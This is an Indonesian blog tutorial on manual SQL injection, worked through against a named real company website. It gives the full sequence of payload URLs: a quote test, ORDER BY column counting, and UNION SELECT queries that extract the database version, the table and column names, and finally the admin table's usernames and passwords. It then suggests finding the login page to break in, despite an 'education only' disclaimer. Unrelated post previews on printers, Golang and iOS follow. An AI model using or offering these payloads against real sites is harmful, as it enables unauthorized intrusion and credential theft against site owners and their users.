Skip to main content

Hacking Website With SQL Injection (Manual)








Relate Search : Melihat isi database dengan teknik manual Sql Injection, Mencuri isi database, Sql Injection, Sqli, Dork Sqli, Cara hacking website dengan sql injection, google dork, dork terbaru.

Sql Injection adalah salah satu teknik hacking suatu website yang memanfaatkan bug Sql pada link dinamis, pada url tersebut attacker dapat memasukkan perintah Sql ke dalam statement Sql via input website. Banyak cara untuk melakukan Sql Injection seperti dengan tools SqlMap, Havij dll, tetapi pada tutorial kali ini saya akan menjelaskan tentang cara Sql Injection secara manual melalui addressbar.

Berikut Langkah-Langkahnya :

1. Siapkan target terlebih dahulu, ( Website yang vulnerable terhadap Sql injection ). Cara mencari nya kita dapat menggunakan Google Dork, untuk melihat google dork terbaru bisa lihat DISINI.
untuk definisi Google Dork dan list Google dork terbaru bisa lihat DISINI.

2. Setelah kita dapat targetnya , sekarang kita akan mulai periksa, apakah website tersebut vulnerable terhadap Sql injection, pada kali ini saya akan mengambil contoh dari website berikut :

http://www.firstgulf.com/search-details.php?id=59




3. Tambahkan Quote pada akhir URL. Contoh :

http://www.firstgulf.com/search-details.php?id=59'



4. Terlihat di atas bahwa terjadi Error Pada Sintax Sql website, hal tersebut menunjukkan website vulnerable terhadap Sql Injection. Setelah itu ganti Quote dengan order by <angka>-- untuk melihat berapa table yang di miliki oleh website.


contoh :
http://www.firstgulf.com/search-details.php?id=59 order by 20--  , kita akan mengetahui jumlah table website apabila dalam permintaan jumlah table tidak terjadi error.

seperti contoh sebelumnya yaitu
http://www.firstgulf.com/search-details.php?id=59 order by 20-- . dalam website target ternyata error, maka lanjutkan ke angka yang lebih bawah.
order by 15-- ( Terjadi Error )
order by 13-- ( Terjadi Error )
order by 11-- ( Tidak Terjadi Error ) #Karna pada angka 11 tidak terjadi Error maka lanjutkan ke angka yang lebih besar selanjutnya yaitu 12.

order by 12-- ( Terjadi Error ) # ternyata pada angka 12 terjadi error, maka bisa di pastikan bahwa website target memiliki jumlah table sebanyak 11.

Contoh Error Order Table :



Hosting Unlimited Indonesia


Contoh Order Table Tanpa Error :





5. Setelah di ketahui bahwa jumlah table ada 11, selanjutnya kita mencari angka akan menunjukkan isi databasenya nanti.tambahkan tanda"-" di awal angka 59, dan deretan angka 1 sampai 11 di akhirnya.

http://www.firstgulf.com/search-details.php?id=-59 union all select
1,2,3,4,5,6,7,8,9,10,11--

6. Dapat di lihat pada gambar di atas, Ketika semua angka di pilih pada perintah Sql = Union All select. pada halaman website target muncul segelintir angka yang posisinya tidak menentu, pada contoh kali ini terlihat angka 2, 3 dan 5. Karna angka 3 yang paling terlihat jelas, jadi kita akan menggunakan angka 3.

7. selanjutnya kita akan melihat versi dari Database Mysql Website target.
ganti angka tiga pada Url sebelumnya, dengan "version()" tanpa tanda kutip.


contoh : http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,version(),4,5,6,7,8,9,10,11--

ternyata setelah di lakukan perintah di atas, angka tiga berganti dengan versi dari database mysql target. dapat terlihat versi nya adalah 5.5.32 .
sebenernya ada versi 4.x.x , tapi pada versi tersebut cara ini tidaka akan berhasil karna untuk database versi 4.x.x , kita akan di hadapkan pada cara Blind Sql.




8.  Selanjutnya kita akan melihat isi daftar table yang ada pada website target .
tambah kan pada url sebelumya.


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--


9. Terlihat sudah daftar nama semua table website target. kita cari nama table yang hampir mirip atau memang tempat penyimpanan user dan password login website. pada contoh di sini, terlihat ada table yang bernama "admin", kita akan pilih itu untuk di lihat kolomnya. sebelum eksekusi ke pembedahan table "admin", kita harus merubah kata "admin" kedalam bentuk hexadesima, untuk melakukannya silahkan kunjungi DISINI.


 Ganti beberapa kata dalam url tadi :

http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e--

NB : kata database() di ganti dengan nama table "admin" yang sudah di jadikan hexadesimal, ditambah 0x di depannya jadi = 0x61646d696e .

10. Setelah langkah di atas selesai dan berhasil, kita akan melihat isi dari table "admin" yaitu beberapa kolom. berikut nama-nama kolom pada table "admin".

# id
# admin_name
# admin_login
# admin_password



11.  Setelah di dapati  semua nama kolom, sekarang waktunya untuk melihat isi dari kolom tersebut.

ketik :


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(id, 0x3a,admin_name,0x3a,admin_login,0x3a,admin_password,0x0d0a),4,5,6,7,8,9,10,11 from admin--

NB : 
0x3a adalah bentuk Hexadesimal dari ":" (colon)
0x0d0a adalah bentuk Hexadesimal dari <enter>


12. akhirnya sudah terlihat isi dari kolom "admin" , di situ sudah terpampang
 id:admin_name:admin_login:admin_password

13. Untuk pengembangan selanjutnya anda bisa melakukan login ke halaman admin atau hanya melakukan pentesting terhadap database.
apabila ingin melanjutkan login, silahkan cari halaman login dengan tools, adminfinder.py download DISINI.

berikut ScreenShot nya :




Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.



Popular posts from this blog

MENGATASI PRINTER KEHABISAN TINTA HITAM

Hai semua…. Saya kembali lagi untuk memberi tips dan trik computer untuk kalian. Pernahkah kalian kehabisan tinta?.Apalagi tinta hitam yang sring di gunakan buat print tugas!. Yah gitulah kalau dompet kempes tapi mau print tugas yang di kumpulin besok, wah mau print di warnet tapi gak punya duit, apalagi beli tinta waaaahhh. Tambah pusing..!!! Tapi jangan khawatir disini saya akan mengulas masalah tersebut dan memberi kalian jalan keluar untuk kalian yang dompetnya lagi kosong melompong kayak punya saya. Hehehe (jangan terseinggung ya, Cuma bercanda) Berikut adalah trik saya untuk print pada printer canon, tapi jangan khawatir kemungkinan besar gak beda jauh koq sama printer merk lain, tapi berbahagialah bagi yang printernya canon. Trik ini memiliki syarat kalau tinta warna harus ADA!! Ingat karna kita disini akan memodifikasi warna bukan menyulap catridge warna hitam yang semula habis menjadi full. LOL :D Nah sudah cukup basa basinya dengan saya berikut tutorialnya :  Buka document ya…

How Strict is Golang? #GolangDev

Hello everyone, in this occasion I would like to share about the strictness of golang. what kind of strict? let see below.

Golang is the functional programming that really have concern about performance, giving limitation to prevent overuse memory is the big deal. for example, golang has a variative type of data such as int, string, boolean, float, array etc. I wonder that you are thinking about "what kind of strictness that is? its totally similar other language", YES. but golang have specification in numeric type of data such as int have int8, int16, int32, int64. golang also have uint8, uint8, uint32 and uint64 which is its really strict you know. the following number after type of data is stand for the length. Obviously you could use the largest type of data for all the variables, but you know it could overwhelming if you put int64 in "is_valid" variable right? joking :D. golang really care about performance, because each length of variable is matters for memo…

Making a Segue Between Storyboard Part II #IOSDev

Hello everyone, in this tutorial i would like to continue my last tutorial about segue, if you dont have read it yet, just go to this link.

in this tutorial i would like to show you how to switch between view controller using programmatically in swift. interesting right? so here it is.
prerequisite:
* create new project
* know how to put segue by drag and drop

firstly, open last xcode project about segue in the first tutorial. and then add new viewcontroller. like bellow


connect segue from first viewcontroller to third viewcontroller by dragging first viewcontroller icon and drop it to third viewcontroller, you could use ctrl+click to drag and drop. after you drop, you will face new popup window, choose "show" like bellow 



click on the segue path link like bellow



on the right side bar, you will see some menu, choose the attribute menu. and then you can see identifier option right there. fill the identifier as you want, in this tutorial we put "seguePartII" as the n…